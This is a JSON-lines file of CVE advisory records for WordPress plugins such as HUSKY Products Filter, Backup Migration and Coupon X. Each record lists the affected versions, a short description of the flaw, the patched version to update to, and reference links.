{"CVE_ID":"CVE-2024-2249","slug":"lastudio-element-kit","versionImpact":"1.3.7.4","versionEndExcluding":"1.3.7.5","description":"The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the LinkWrapper attribute found in several widgets in all versions up to, and including, 1.3.7.4 due to insufficient input sanitization and output escaping the user supplied attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.7.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5113170a-5a53-4e53-84e6-56d9ba0740ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5113170a-5a53-4e53-84e6-56d9ba0740ed?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3050316\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/extensions\\\/elementor\\\/wrapper-link.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3050316\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/extensions\\\/elementor\\\/wrapper-link.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5822","slug":"drag-and-drop-multiple-file-upload-contact-form-7","versionImpact":"1.3.7.3","versionEndExcluding":"1.3.7.4","description":"The Drag and Drop Multiple File Upload - Contact Form 7 plugin for WordPress is vulnerable to arbitrary file uploads to insufficient file type validation in the 'dnd_upload_cf7_upload' function in versions up to, and including, 1.3.7.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. This can be exploited if a user authorized to edit form, which means editor privileges or above, has added a 'multiple file upload' form field with '*' acceptable file types.","recommendation":"Update to version 1.3.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b3be300-5b7f-4844-8637-1bb8c939ed4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b3be300-5b7f-4844-8637-1bb8c939ed4c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.7.2\\\/inc\\\/dnd-upload-cf7.php#L828\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.7.2\\\/inc\\\/dnd-upload-cf7.php#L828\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.7.2\\\/inc\\\/dnd-upload-cf7.php#L855\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.7.2\\\/inc\\\/dnd-upload-cf7.php#L855\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.7.2\\\/inc\\\/dnd-upload-cf7.php#L904\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.7.2\\\/inc\\\/dnd-upload-cf7.php#L904\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2987252%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&old=2968538%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2987252%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&old=2968538%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24566","slug":"woocommerce-currency-switcher","versionImpact":"1.3.7","versionEndExcluding":"1.3.7.1","description":"The WooCommerce Currency Switcher FOX WordPress plugin before 1.3.7 was vulnerable to LFI attacks via the \"woocs\" shortcode.","recommendation":"Update to version 1.3.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0bc4b13-53fe-462d-8306-8915196d3a5a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0bc4b13-53fe-462d-8306-8915196d3a5a\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/jetpack.com\\\/2021\\\/07\\\/22\\\/severe-vulnerability-patched-in-woocommerce-currency-switcher\\\/\",\"name\":\"https:\\\/\\\/jetpack.com\\\/2021\\\/07\\\/22\\\/severe-vulnerability-patched-in-woocommerce-currency-switcher\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4000","slug":"pearl-header-builder","versionImpact":"1.3.6","versionEndExcluding":"1.3.7","description":"The WordPress Header Builder Plugin \u2013 Pearl plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'stm_hb' shortcode in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c23bba83-35d2-4098-8104-8389bb2ff880?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c23bba83-35d2-4098-8104-8389bb2ff880?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3078437%40pearl-header-builder&new=3078437%40pearl-header-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3078437%40pearl-header-builder&new=3078437%40pearl-header-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10794","slug":"boostify-header-footer-builder","versionImpact":"1.3.6","versionEndExcluding":"1.3.7","description":"The Boostify Header Footer Builder for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.3.6 via the 'bhf' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created via Elementor that they should not have access to.","recommendation":"Update to version 1.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e9f6d07-5ba5-48ad-bfcc-084913436b39?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e9f6d07-5ba5-48ad-bfcc-084913436b39?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3185478\\\/boostify-header-footer-builder\\\/trunk\\\/inc\\\/class-boostify-header-footer-builder.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3185478\\\/boostify-header-footer-builder\\\/trunk\\\/inc\\\/class-boostify-header-footer-builder.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7420","slug":"insert-php-code-snippet","versionImpact":"1.3.6","versionEndExcluding":"1.3.7","description":"The Insert PHP Code Snippet plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.6. This is due to missing or incorrect nonce validation in the \/admin\/snippets.php file. This makes it possible for unauthenticated attackers to activate\/deactivate and delete code snippets via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88001f3c-f5cc-4051-a713-788014e2241a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88001f3c-f5cc-4051-a713-788014e2241a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/insert-php-code-snippet\\\/trunk\\\/admin\\\/snippets.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/insert-php-code-snippet\\\/trunk\\\/admin\\\/snippets.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134787\\\/insert-php-code-snippet\\\/trunk\\\/admin\\\/snippets.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134787\\\/insert-php-code-snippet\\\/trunk\\\/admin\\\/snippets.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2014-125103","slug":"twitter-plugin","versionImpact":"1.3.2","versionEndExcluding":"1.3.7","description":"A vulnerability was found in BestWebSoft Twitter Plugin up to 1.3.2 on WordPress. It has been declared as problematic. Affected by this vulnerability is the function twttr_settings_page of the file twitter.php. The manipulation of the argument twttr_url_twitter\/bws_license_key\/bws_license_plugin leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.3.7 is able to address this issue. The name of the patch is e04d59ab578316ffeb204cf32dc71c0d0e1ff77c. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-230155.","recommendation":"Update to version 1.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230155\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230155\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/twitter-plugin\\\/commit\\\/e04d59ab578316ffeb204cf32dc71c0d0e1ff77c\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/twitter-plugin\\\/commit\\\/e04d59ab578316ffeb204cf32dc71c0d0e1ff77c\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230155\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230155\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6266","slug":"backup-backup","versionImpact":"1.3.6","versionEndExcluding":"1.3.7","description":"The Backup Migration plugin for WordPress is vulnerable to unauthorized access of data due to insufficient path and file validation on the BMI_BACKUP case of the handle_downloading function in all versions up to, and including, 1.3.6. This makes it possible for unauthenticated attackers to download back-up files which can contain sensitive information such as user passwords, PII,  database credentials, and much more.","recommendation":"Update to version 1.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08801f53-3c57-41a3-a637-4b52637cc612?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08801f53-3c57-41a3-a637-4b52637cc612?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.5\\\/includes\\\/initializer.php#L972\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.5\\\/includes\\\/initializer.php#L972\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.5\\\/includes\\\/initializer.php#L1048\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.5\\\/includes\\\/initializer.php#L1048\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/initializer.php#L1065\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/initializer.php#L1065\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1661","slug":"woocommerce-products-filter","versionImpact":"1.3.6.5","versionEndExcluding":"1.3.6.6","description":"The HUSKY \u2013 Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.6.5 via the 'template' parameter of the woof_text_search AJAX action. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 1.3.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-products-filter\\\/trunk\\\/ext\\\/by_text\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-products-filter\\\/trunk\\\/ext\\\/by_text\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249621%40woocommerce-products-filter&new=3249621%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249621%40woocommerce-products-filter&new=3249621%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3253169%40woocommerce-products-filter&new=3253169%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3253169%40woocommerce-products-filter&new=3253169%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ae7b6fc-2120-4573-8b1b-d5422d435fa5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ae7b6fc-2120-4573-8b1b-d5422d435fa5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11400","slug":"woocommerce-products-filter","versionImpact":"1.3.6.3","versionEndExcluding":"1.3.6.4","description":"The HUSKY \u2013 Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the really_curr_tax parameter in all versions up to, and including, 1.3.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3158e77-39b3-4151-8f10-5824000a585a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3158e77-39b3-4151-8f10-5824000a585a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186438\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186438\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7491","slug":"woocommerce-products-filter","versionImpact":"1.3.6.1","versionEndExcluding":"1.3.6.2","description":"The HUSKY \u2013 Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.3.6.1 via the woof_messenger_remove_subscr AJAX action due to missing validation on the 'key' user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to unsubscribe users from a product notification sign-ups, if they can successfully obtain or brute force the key value for users who signed up to receive notifications. This vulnerability requires the plugin's Products Messenger extension to be enabled.","recommendation":"Update to version 1.3.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/daf6b0d5-79a6-4b8f-924e-9e78cb2b5742?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/daf6b0d5-79a6-4b8f-924e-9e78cb2b5742?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3156511%40woocommerce-products-filter&old=3129454%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3156511%40woocommerce-products-filter&old=3129454%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6457","slug":"woocommerce-products-filter","versionImpact":"1.3.6","versionEndExcluding":"1.3.6.1","description":"The HUSKY \u2013 Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018woof_author\u2019 parameter in all versions up to, and including, 1.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.3.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecfdf7b1-9bb8-4c1d-a00a-ca1e44440cab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecfdf7b1-9bb8-4c1d-a00a-ca1e44440cab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-products-filter\\\/trunk\\\/ext\\\/by_author\\\/index.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-products-filter\\\/trunk\\\/ext\\\/by_author\\\/index.php#L102\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116888\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116888\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9061","slug":"wp-popup-builder","versionImpact":"1.3.5","versionEndExcluding":"1.3.6","description":"The The WP Popup Builder \u2013 Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. NOTE: This vulnerability was partially fixed in version 1.3.5 with a nonce check, which effectively prevented access to the affected function. However, version 1.3.6 incorporates the correct authorization check to prevent unauthorized access.","recommendation":"Update to version 1.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cac1dc0-87dc-43eb-9db1-638a91200b43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cac1dc0-87dc-43eb-9db1-638a91200b43?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166506\\\/wp-popup-builder\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166506\\\/wp-popup-builder\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12627","slug":"coupon-x-discount-pop-up","versionImpact":"1.3.5","versionEndExcluding":"1.3.6","description":"The Coupon X: Discount Pop Up, Promo Code Pop Ups, Announcement Pop Up, WooCommerce Popups plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.5 via deserialization of untrusted input from post content passed to the capture_email AJAX action. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219466\\\/coupon-x-discount-pop-up\\\/trunk\\\/inc\\\/class-cx-rest.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219466\\\/coupon-x-discount-pop-up\\\/trunk\\\/inc\\\/class-cx-rest.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/468be776-8804-4d2f-8eaf-841bbf598ef9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/468be776-8804-4d2f-8eaf-841bbf598ef9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12204","slug":"coupon-x-discount-pop-up","versionImpact":"1.3.5","versionEndExcluding":"1.3.6","description":"The Coupon X: Discount Pop Up, Promo Code Pop Ups, Announcement Pop Up, WooCommerce Popups plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions in the class-cx-rest.php file in all versions up to, and including, 1.3.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create 100% off coupons, delete posts, delete leads, and update coupon statuses.","recommendation":"Update to version 1.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219466\\\/coupon-x-discount-pop-up\\\/trunk\\\/inc\\\/class-cx-rest.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219466\\\/coupon-x-discount-pop-up\\\/trunk\\\/inc\\\/class-cx-rest.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e52d8b5e-727f-474a-a255-c24033db17d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e52d8b5e-727f-474a-a255-c24033db17d8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6271","slug":"backup-backup","versionEndExcluding":"1.3.6","description":"The Backup Migration WordPress plugin before 1.3.6 stores in-progress backups information in easy to find, publicly-accessible files, which may allow attackers monitoring those to leak sensitive information from the site's backups.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ac217db-f332-404b-a265-6dc86fe747b9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ac217db-f332-404b-a265-6dc86fe747b9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-6271-backup-migration-unauth-sensitive-data-exposure-to-full-control-of-the-site-poc-exploit\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-6271-backup-migration-unauth-sensitive-data-exposure-to-full-control-of-the-site-poc-exploit\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13533","slug":"small-package-quotes-usps-edition","versionImpact":"1.3.5","versionEndExcluding":"1.3.6","description":"The Small Package Quotes \u2013 USPS Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' parameter in all versions up to, and including, 1.3.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/small-package-quotes-usps-edition\\\/trunk\\\/admin\\\/tab\\\/shipping-rules\\\/shipping-rules-save.php#L77\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/small-package-quotes-usps-edition\\\/trunk\\\/admin\\\/tab\\\/shipping-rules\\\/shipping-rules-save.php#L77\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242060%40small-package-quotes-usps-edition&new=3242060%40small-package-quotes-usps-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242060%40small-package-quotes-usps-edition&new=3242060%40small-package-quotes-usps-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0e67883-1f6c-4454-8d51-96fa2d1366d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0e67883-1f6c-4454-8d51-96fa2d1366d7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1663","slug":"ultimate-noindex-nofollow-tool-ii","versionImpact":"1.3.5","versionEndExcluding":"1.3.6","description":"The Ultimate Noindex Nofollow Tool II WordPress plugin before 1.3.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d101f2b-e903-4e64-92cc-e550abb52d6f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d101f2b-e903-4e64-92cc-e550abb52d6f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10360","slug":"move-addons","versionImpact":"1.3.5","versionEndExcluding":"1.3.6","description":"The Move Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.5 via the render function in includes\/widgets\/accordion\/widget.php, includes\/widgets\/remote-template\/widget.php, and other widget.php files. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 1.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eafe73b4-b492-45c7-adca-d9a3042144b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eafe73b4-b492-45c7-adca-d9a3042144b4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176341\\\/move-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176341\\\/move-addons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5039","slug":"woocommerce-products-filter","versionImpact":"1.3.5.3","versionEndExcluding":"1.3.6","description":"The HUSKY \u2013 Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.3.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f6e7fcd-f5f5-47a0-9d8a-74e2f67d10b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f6e7fcd-f5f5-47a0-9d8a-74e2f67d10b5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-products-filter\\\/trunk\\\/views\\\/woof.php#L525\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-products-filter\\\/trunk\\\/views\\\/woof.php#L525\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093324\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093324\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
